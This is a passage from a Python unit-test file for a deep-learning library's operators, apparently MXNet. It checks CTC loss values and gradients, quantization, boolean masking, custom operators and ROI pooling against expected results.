true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
check_ctc_loss(acts, labels, true_loss)
check_contrib_ctc_loss(acts, labels, true_loss)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels2, true_loss)
check_contrib_ctc_loss(acts2, labels2, true_loss)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels3, true_loss)
check_contrib_ctc_loss(acts2, labels3, true_loss)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss.asnumpy(), expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
check_ctc_loss_grad('first')
check_ctc_loss_grad('last')
check_contrib_ctc_loss_grad('first')
check_contrib_ctc_loss_grad('last')
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output.asnumpy(), expected_output.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(x2.grad.asnumpy(), expected_grad.asnumpy(), rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x.asnumpy(), np.ones(shape=(10, 10), dtype=np.float32))
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
